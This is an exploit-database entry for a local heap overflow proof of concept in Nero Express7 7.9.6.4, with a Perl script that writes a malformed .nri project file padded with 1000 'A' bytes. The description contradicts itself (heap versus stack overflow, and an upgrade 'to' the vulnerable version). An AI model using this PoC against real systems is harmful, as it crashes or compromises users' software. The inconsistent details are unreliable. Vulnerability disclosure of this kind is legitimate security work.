header-logo
Suggest Exploit
vendor:
Nero Express7
by:
D3V!L FUCKER
9,3
CVSS
HIGH
Heap Overflow
119
CWE
Product Name: Nero Express7
Affected Version From: Nero Express7 Ver.7.9.6.4
Affected Version To: Nero Express7 Ver.7.9.6.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista SP0
2010

Nero Express7 Local Heap Poc

A heap overflow vulnerability exists in Nero Express7 Ver.7.9.6.4, which could allow an attacker to execute arbitrary code on the target system. The vulnerability is caused due to a boundary error when handling a specially crafted .nri file. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .nri file.

Mitigation:

Upgrade to the latest version of Nero Express7 Ver.7.9.6.4
Source

Exploit-DB raw data:

#!/user/bin/perl
# Exploit Title: [Nero Express7 Local Heap Poc]
# Date: [2010/01/01]
# Author: [D3V!L FUCKER]
# Version: [Nero Express7 Ver.7.9.6.4]
# Tested on: [windows vista sp0]
#After Setup Open Nero StartSmart Essentials => Favorites => Open Projects => explit.nir
# Code :
$headr=
"\xFF\xFE\xFF\x0E\x4E\x00\x65\x00\x72\x00\x6F\x00\x49\x00\x53\x00".
"\x4F\x00\x30\x00\x2E\x00\x30\x00\x33\x00\x2E\x00\x30\x00\x31\x00";

$boom="A" x 1000;

open(myfile,'>>exploit.nri') || die "Cannot Creat file\n\n";
print myfile $headr;
print myfile $boom;
print "Done..!~#\n";

Navigation

Suggest Exploit

Services By CQR